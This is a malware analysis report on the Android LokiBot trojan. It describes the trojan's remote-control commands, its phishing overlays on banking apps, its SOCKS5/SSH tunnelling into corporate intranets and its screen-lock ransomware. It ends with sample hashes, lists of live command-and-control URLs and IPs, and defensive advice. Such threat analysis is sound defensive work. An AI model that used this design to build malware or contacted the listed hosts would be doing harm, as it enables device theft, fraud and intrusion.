The author:Qian Dun Anti-fraud laboratory

0x1. Introduction to Trojan Horses

Recently, client-side detection revealed “LokiBot” Trojan, Qian Dun anti-fraud laboratory rapid response analysis, found that “LokiBot” Trojan is evolved from “BankBot”. Compared with other bank hijacking Trojan, “LokiBot” has its unique functions. It can launch corresponding attacks according to different target environments, such as interface hijacking and encryption of user device data, extortion and fraud of users’ money, establishment of SOCKs5 agent and SSH tunnel, and infiltration of enterprise Intranet data.

LokiBot sends fake application updates such as Adobe Flash Playe, APK Installer, System Update, Adblock, and Security Certificate through malicious websites. Induce user installation. The operation screenshot is as follows:




0x2. Sample analysis  

2.1 Malicious Code parsing

Key components and code blocks of LokiBot are as follows:



MainActivity: malicious code execution portal. Emulator check [1], icon hide, boot active device management, and start CommandService and InjectProcess.

Boot: Receiver, an entry for malicious code execution. The core service CommandService remains alive.

CommandService: Core service that executes malicious code according to remote control instructions.

InjectProcess: Interface hijacking service.

Crypt module: encrypt files, lock devices for extortion.

Socks module: Implements the Socks5 protocol and SSH tunnel to forward traffic between the Intranet server where the controlled device resides and the attacker host.


2.2 Remote Control

First upload device deviceId, screen lock status, and network type to the control end (**92500503912**:Loki:1:wifi). The control end uses user deviceId as the BROiler ID and sends command data to trigger malicious behaviors. The instructions include:


instruction

function

Send_SMS

Using the victim’s identity to send malicious text messages to random users

Send_USSD

Dial any number

Go_Contacts

Uploading Device Contacts

Gethistori

Upload browser history

Start_AllApp

The name of the device installation application package was uploaded

Update Bots

Update LokiBot

Forward_call

Configuring Call Transfer

Go_Leading_request

WebView loads malicious URLS

Go_Passwords

Set a screen-lock password

DeleteApp

Uninstalls itself, deactivates device management, and triggers extortion

Go_Smsmnd

Set the default SMS application

GetAllSms

Obtain SMS records of users

DellSms

Delete the latest SMS message

Send_spam

SMS worm that sends malicious content to users’ contacts

App_call

Start any app

Shells

Execution of the shell

Go_Crypt

Lock the user device and encrypt the device file

Go_Scrynlock

The device is locked out of use by the user

startSocks

Install the Socks5 agent

Start_Inject

Start InjectProcess to perform bank application hijacking


LokiBot will launch attacks based on the collected user data. The attack means mainly include the following three methods:

  1. Users with banking or social apps installed on their devices will launch app hijacking attacks;

  2. The user network belongs to an enterprise and penetrates the Intranet.

  3. Directly send DeleteApp or Go_Crypt command, the implementation of extortion.


2.3 Application Hijacking

The hijacking process is similar to “BankBot” Trojan [2], in that it uploads the user installation list, configits hijacking interface in the cloud, and monitors the application in the background. Once the user opens the application in the hijacking list, a phishing interface will pop up to cover the real application and induce the user to input account and password. Because this kind of Trojan life cycle is short, “LokiBot” takes the initiative to initiate application hijacking. Methods include:

  1. Start the application to be hijacked by remote command;

  2. The fake App Notification will pop up actively. Once the user clicks, the phishing interface will pop up

2.4 Intranet Penetration

If the controlled device is in an Intranet environment, “LokiBot” issues startSocks command to establish Socks5 proxy and SSH secure tunnel [3]. In this way, the attacker uses the mobile device as a springboard to invade the Intranet and steal enterprise data assets.

“LokiBot” Trojan Intranet penetration process:

  1. The Trojan horse (SSH Client) actively connects to the attacker host (SSH Server), establishes an SSH connection, and sets the port forwarding mode to remote port forwarding. In this way, secure data communication is completed between the SSH Client and SSH Server, and TCP connections that cannot be established before can be broken through the firewall restrictions.

  2. Trojan horse Creates a socket as the SOCKS server and waits for the connection of the LOCAL SSH client (Trojan horse). After the connection is successful, the Trojan horse can penetrate Intranet data through the SSH secure tunnel.

Establish an SSH secure transmission tunnel

The startSocks data command sent by the control end also includes the IP address of the attacker’s host, the port that the Trojan horse listens to as the SOCKS server, and the user name and password of the Trojan horse connected to the attacker’s host (SSH server). The Trojan horse creates an asynchronous task that internally uses the interface provided by the JSch package to connect the attacker host and set port forwarding.

 

Socks proxy

Trojan implements a SET of SOCKS5 protocols to forward data traffic between Intranet servers and attackers. In this way, the Trojan horse (SSH client) securely transmits the accessed Intranet data to the attacker through the SSH tunnel.

2.5 Screen lock Extortion

After successfully inducing users to activate device management, LokiBot hides in the background and executes malicious code. If a user detects malicious software and tries to uninstall it or sends the DeleteApp or Go_Crypt command on the control end, the device lock is triggered to encrypt the file code on the user’s device. In the following figure, the device management rights are disabled, and the CriptActivity$mainActivity is executed to implement screen-lock extortion.

AES encrypts all files in the SD directory and deletes the original files.

By adding flag = FLAG_WATCH_OUTSIDE_TOUCH | FLAG_LAYOUT_IN_SCREEN | FLAG_NOT_FOCUSABLE View to the device Window, the user can’t use the phone to intimidate the user into encrypting the device file. You must pay $70 via Bitcoin. The payment address of BTC is hard-coded in the resource file. According to the transaction address, it can be found that the account had its first transaction in July 2015 and started to make frequent transactions in February this year. Recently, the transaction showed a downward trend, with 1341 transactions in total and a total income of 48.821BTC.


Sample sha256

97343643ed13e3aa680aaf6604ca63f447cdfc886b6692be6620d4b7cddb2a35

00d8b0b6676a3225bd184202649b4c1d66cd61237cfad4451a10397858c92fd3

b28252734dd6cbd2b9c43b84ec69865c5ee6daea25b521387cf241f6326f14a3

6fbecc9ecf39b0a5c1bc549f2690a0948c50f7228679af852546a1b2e9d80de6

b3c653d323a59645c30d756a36a5dd69eb36042fc17107e8b4985c813deabaf5

b2cc3b288d4bb855e64343317cf1560cb09f22322618c5ff9bdc9d9e70c8f335

f5a5f931e11af31fa22ef24ba0e4fff2600359498673d18b5eb321da1d5b31e0

bf13ee6be6e13e8a924ca9b85ad5078eafabf5b444b56fab2d5adcf3f8025891

fea63f4b85b4fd094a761cd10069d813c68428121b087f58db2ea273250ec39b

ab51dcd0629758743ed1aa48531a71852a49454cc9c90f37fbedb8c02547d258

a912166eaf2c8e0c3c87f17bb208f622a0b51bfa1124e5ba84f42a4adf7a96b4

1979d60ba17434d7b4b5403c7fd005d303831b1a584ea2bed89cfec0b45bd5c2

97d7c975ceb7f7478d521b0f35fdb4a14bd26c6dfde65e29533fdaf6d1ac9db6

1d828d3a89242513048546769f3c1394ff134b76ed08c7d8d9ec07e495cd14f5

1902424d09c9ddce312c84d166353199c5e6da97918b61616ec38431bdaa1359

b89892fe9fd306636cb79225ab260320b26b2313d1f415f885b8d6843fcc6919

e8714558ba46b2e44f1167baf0e427ed408c6946a045be245061f1a914869a27

418bdfa331cba37b1185645c71ee2cf31eb01cfcc949569f1addbff79f73be66

a9899519a45f4c5dc5029d39317d0e583cd04eb7d7fa88723b46e14227809c26

3c258581214d4321875218ed716d684d75e21d6fa5dc95c6109d6c76de513aca

a1f7498c8ae20452e25bb1731ab79f8226ed93713990496009cd9060954cea3c

3136fd5a06ad5b1cdc48ade31fe5fdce6c050e514f028db18230d31801592995

7ebebd2b83ea29668e14d29e89e96cf58665e01603b970823b2f4f97e7a2c159

e46aee4b737d1328b7811d5d6158a6e1629dc3b08d802378eaba7c63d47de78b

1e4795407db5f3084fcdc8ebb3a1486af4720495d85c5ebe6b8489fc9f20e372

1a18fc5f117c8240dce9379390fe5da27e6b135246dcb7ac37abb1acf47db0fe

92229e3b0c95ad4aee3cf9f0a2270aeb62cedd35869d726399fe980154782019

0f7fc30cc701bea7e6ffa541665670ff126a9b3bc0c55ea9bc51c461d8d629a8

b280c4b1954abc1979a67ee9c60fd8d8690921aa92ce217592a3b0653a7694c1

93c229c459fb13890bafc4fed2f1974948940d0cbc81ed64b4817a2c6619036e

0b5c854fceaccad3516ebb1a424d935d393fa2f2246f1704e36e8084e29949c8

c260e60567723af1dddc717a87cf2c24e1fdc7981ea379dd8f11f5a8f272e63c

a09d9d09090ea23cbfe202a159aba717c71bf2f0f1d6eed36da4de1d42f91c74

84136b96ee1487a3f763436c5e60591be321ac4dd953d2b9a03dbec908d1962a

c6acdb6a3df9522b688a7bb38e175b332639121d840305394f05f7f594b2917c

2bad6d8530601a8ab67dbc581184138b87d2c7cb3a63a1d15d7f774b3f4f9cd0

bc93d1c1dea582e039f9bcb99d506842c2c2a757b57ff7fda299eac079019bd8

7f4bbe3e6ba3a35e7a187369f5ed280de557e93121c85f2a9e4a8bb63ac8f7f2

77c149c2892adbf2e5c69374ccf24de22788afbc5800b3d3fcd332e3d2042de2

6eb92722e16840495363bb3f3e6bba6f2c6f30ad9eb8e891b90eb455dc5e3e91

794d79a549711e2eba0ebbf1d2720948295b3c5e21c5c3c39064abaa632e902e

09bad7c39020c29d68f9357812f2fb355750d3980c32c02f920f54ba42bb8726

8ef0edca1822d0460a34f59d564458ee3cc420afc7166612cb1a16eab01583e0

fb188fcd914e891f26985c0b19935ce5e5ca0c96a977e6c04df2a3c6c86d9ea8

7ed19d67d7ab8934aac1a125446d3132f1f4ccfb0c2419f333bdc90f8aef09c0

ce0c24d3c856e8f1c05f238aa5222fb11dbdfc562becdc0ff9ba2c7152860008

18da21d688317ba1eb704b9127757d1c9feeac362537fccd7e68ecb7e06adeb9

83497ac340f6e38b54395eacd8e02405fb5b28125b8537e74dbce1de3bef79d5

2e6b667076dec035e5ca19823697eb64b190a9009a2d21bfd5ed7374d32c21f0


C&C

http://updddatererb1.gdn/sfdsdfsdf/

http://tyfgbjyf.xyz/sfdsdfsdf/

http://dghooghel.com/sfdsdfsdf/

http://sdtyoty.gdn/sfdsdfsdf/

http://rthrew.gdn/sfdsdfsdf/

http://spirit7a.pw/sfdsdfsdf/

http://cofonderot.top/sfdsdfsdf/

http://sdfsdfsf.today/sfdsdfsdf/

http://sdfsdfsf.gdn/sfdsdfsdf/

http://dgdfgdfg.top/sfdsdfsdf

http://profitino365.com/sfdsdfsdf/

http://sdfsdgfsdfsdfsd.info/sfdsdfsdf/

http://showtopik.gdn/tosskd/

http://showtopik.xyz/kdlhoi/

http://showtopics.biz/saddasd/

http://tescoy.com/asffar929/

http://pornohab24.com/dklska/

http://185.209.20.28/sdfsdfdsf/

http://185.206.145.22/sfdsdfsdf/

http://185.165.29.29/dover/

http://185.110.132.60/sfdsdfsdf/

http://217.172.172.10/adminlod/

http://217.23.6.14/adminlod/

http://94.75.237.86/sfdsdfsdf/

http://85.93.6.104/sfdsdfsdfhfghf/

http://77.72.84.48/gslrmgt/


0x3 Security Suggestion

As LokiBot is an example, hackers use mobile devices as a springboard to invade the enterprise Intranet for many times. Therefore, enterprises should strengthen prevention measures, strictly restrict the connection of untrusted devices to the Intranet, and strengthen the network security awareness of employees. For ordinary users, please download the application to the official website or security application market, do not click on any pornographic links, especially SMS, QQ, wechat and other chat tools are not familiar with “friends” to the link, install security protection software, regular virus detection.


reference

[1] Simulator detection

https://github.com/strazzere/anti-emulator

[2] New BankBot Trojan analysis

https://jaq.alibaba.com/community/art/show?articleid=783

BankBot AvPass analysis

https://jaq.alibaba.com/community/art/show?spm=a313e.7916648.0.0.3775bb8euvWFHg&articleid=1028

[3] Actual SSH port forwarding

https://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/